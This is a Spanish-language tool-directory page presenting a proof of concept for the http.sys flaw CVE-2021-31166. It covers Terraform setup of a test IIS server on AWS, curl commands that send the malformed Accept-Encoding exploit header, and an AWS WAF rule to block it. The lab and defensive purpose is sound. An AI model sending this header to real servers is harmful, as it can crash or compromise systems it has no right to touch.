Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/bgsilvait/win-cve-2021-31166
Análisis de VulnerabilidadesExplotaciónEvasión de IDS/IPSSeguridad WebSeguridad en la NubeDevSecOps
GitHubbgsilvait/win-cve-2021-31166

WIn-CVE-2021-31166

Prueba de concepto para CVE-2021-31166 (http.sys RCE) con despliegue de Terraform en AWS, incluidos scripts de prueba y una regla WAFv2 para bloquear la explotación.

Ver Repositorio
2hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

WIn-CVE-2021-31166

Este Repositorio está inspirado en 0vercl0k para una prueba de concepto de CVE-2021-31166 ("Vulnerabilidad de Ejecución Remota de Código en la Pila del Protocolo HTTP"), una desreferencia use-after-free en http.sys parcheada por Microsoft en mayo de 2021.

Infraestructura de Build

root@kitploit:~
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve

Terraform creará una instancia EC2 con Windows Server Core 20H2, instalará IIS y agregará permisos SSM para abrir una sesión de Web Powershell desde la Consola de AWS. También creará un Application Load Balancer y utilizará la instancia como destino. Por defecto, el agregará solo como permitida para acceder por .

Security Group
TU IP
HTTP

Obtener valores

root@kitploit:~
#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')

Prueba de Conectividad

root@kitploit:~
#Testing to ALB
while true; do curl -I $ALB --connect-timeout 1 ; done

#Testing Directly to EC2'
while true; do curl -I $EC2IP --connect-timeout 1 ; done

Inyectar Cabecera CVE

root@kitploit:~
#Testing to ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"

#Testing Directly to EC2'
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"

Regla para AWS WAFv2 para Bloquear

root@kitploit:~
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
Descargar herramienta